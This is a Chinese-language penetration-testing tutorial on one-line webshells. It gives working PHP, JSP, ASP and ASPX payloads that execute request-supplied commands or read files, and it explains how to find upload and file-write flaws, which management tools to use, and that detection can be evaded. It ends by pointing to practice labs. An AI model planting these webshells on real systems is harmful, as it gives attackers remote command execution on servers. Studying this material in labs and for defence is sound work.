Web渗透之一句话木马

Web渗透之一句话木马

1)常见的一句话木马及漏洞关联

常见的一句话木马(按Web语言分类):

php:<?php @eval(_POST\['pass'\]);?\>(通过POST参数pass执行命令)、\_GET['cmd']);?>(通过GET参数cmd执行系统命令)

jsp:<%@page import="java.io.*"%><%Runtime.getRuntime().exec(request.getParameter("cmd"));%>(执行参数cmd的命令)、<%newProcessBuilder(request.getParameter("cmd")).start();%>

asp:<%execute(request("pass"))%>(执行POST参数pass的命令)、<%evalrequest("code")%>

aspx:<%@Page Language="C#"%><%System.Diagnostics.Process.Start(Request["cmd"]);%>、<%Response.Write(System.IO.File.ReadAllText(Request["file"]));%>(读取文件内容)

注意一句话木马杀软/edr会检测,但是咱们可以使用免杀技术来绕过检测,常见的WebShell免杀技术有:特征值处理类,代码混淆类,加密免杀类,白名单绕过类等等,后面有时间本人开免杀指导咱们再聊这些。

黑盒查看漏洞:

功能关联:

重点关注网站的文件上传功能(如头像上传、附件上传、文档上传),尝试上传包含一句话木马的文件

检查是否有数据写入功能(如留言板、配置保存、日志记录),测试能否通过输入框写入木马代码

观察文件上传后的返回信息,如是否显示文件路径、是否允许php/jsp/asp/aspx等脚本后缀

白盒代码审计:

关键词搜索:

在源码中搜索文件上传相关函数,判断是否存在过滤不严的情况:

PHP:move_uploaded_file()、is_uploaded_file()、$_FILES

JSP:ServletFileUpload、FileItem、write()

ASP:Upload组件、FileSystemObject

ASPX:FileUpload控件、SaveAs()方法

搜索文件写入相关函数,判断是否可注入木马代码:

PHP:file_put_contents()、fwrite()、fputs()

JSP:FileWriter、BufferedWriter、OutputStreamWriter

ASP:CreateTextFile()、WriteLine()

ASPX:File.WriteAllText()、StreamWriter

2)一句话木马方法

黑盒测试:

黑盒测试(无源码,基于功能场景探测)

黑盒测试不依赖目标系统的源代码,仅通过模拟攻击者的实际操作,利用网站公开功能(如文件上传、数据提交、参数交互等)尝试植入或触发一句话木马,核心思路是"寻找可写入脚本代码的入口,并验证代码是否能被服务器解析执行"。

白盒测试:

白盒测试依赖目标系统的源代码,核心是"通过审计代码逻辑,发现可植入/触发一句话木马的漏洞点"即寻找"文件操作、命令执行、参数解析"相关代码中过滤不严、逻辑缺陷的位置,判断攻击者能否利用这些缺陷注入木马代码。

3)Webshell木马工具

冰蝎(Behinder):一款国产的Webshell管理工具,支持多种加密传输方式(如AES、RSA),能有效绕过WAF检测。支持PHP、JSP、ASP、ASPX等多种脚本类型,提供命令执行、文件管理、数据库操作等功能,界面简洁,操作便捷,是国内渗透测试人员常用工具。

菜刀(Caidao):经典的Webshell管理工具,虽然版本更新较慢,但因其轻量、稳定,仍被广泛使用。支持通过HTTP协议与一句话木马交互,可执行命令、管理文件、操作数据库等,适用于多种Web语言环境。

蚁剑(AntSword):开源的Webshell管理工具,具有模块化架构,支持自定义编码和加密方式,能灵活绕过各种安全防护。提供可视化界面,支持文件管理、命令执行、反弹shell等功能,且社区活跃,插件丰富。

CobaltStrike:国外知名的渗透测试框架,其中包含Webshell管理功能。支持生成多种类型的恶意payload,可通过Webshell实现对目标主机的持久控制,集成了团队协作、会话管理、漏洞利用等多种功能,适合高级渗透测试场景。

Weevely:一款轻量级的Python编写的Webshell工具,主要针对PHP环境。支持生成隐蔽的一句话木马,通过命令行与目标交互,提供文件操作、系统命令执行、数据库访问等功能,适合在命令行环境下进行渗透测试。

自己开发WebShell工具:当然我们也可以自己写这类工具,防止指纹被识别到。

4)靶场

DVWA:包含文件上传模块,可练习各种一句话木马的上传与利用

Upload-Labs:专注于文件上传漏洞练习,包含20多种不同的上传绕过场景

VulnHub:提供多个包含Webshell漏洞的虚拟机靶场,如Metasploitable

HackTheBox:有多个包含文件上传和反序列化漏洞的靶机,适合进阶练习

CTFtime:提供大量CTF比赛中的Webshell相关题目,适合实战训练

相关推荐
white-persist3 小时前
Burp Suite模拟器抓包全攻略
前端·网络·安全·web安全·notepad++·原型模式
网安小白的进阶之路8 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-3
网络·安全·web安全
源文雨10 小时前
MacOS 下 Warp ping 局域网设备报错 ping: sendto: No route to host 的解决方法
运维·网络协议·安全·macos·网络安全·ping
独行soc20 小时前
2025年渗透测试面试题总结-102(题目+回答)
网络·安全·web安全·网络安全·adb·渗透测试·安全狮
key061 天前
网络安全等级保护测评实施过程
数据库·安全·web安全·安全合规
Allen_LVyingbo1 天前
人工智能赋能传统医疗设施设备改造:路径、挑战与未来展望
信息可视化·健康医疗·ai编程·安全架构
余防1 天前
bypass--绕Waf
安全·web安全·网络安全
独行soc1 天前
2025年渗透测试面试题总结-101(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮
云安全联盟大中华区1 天前
以美为鉴:构建现代化的核能行业网络安全合规体系--为人工智能革命提供动力
人工智能·安全·web安全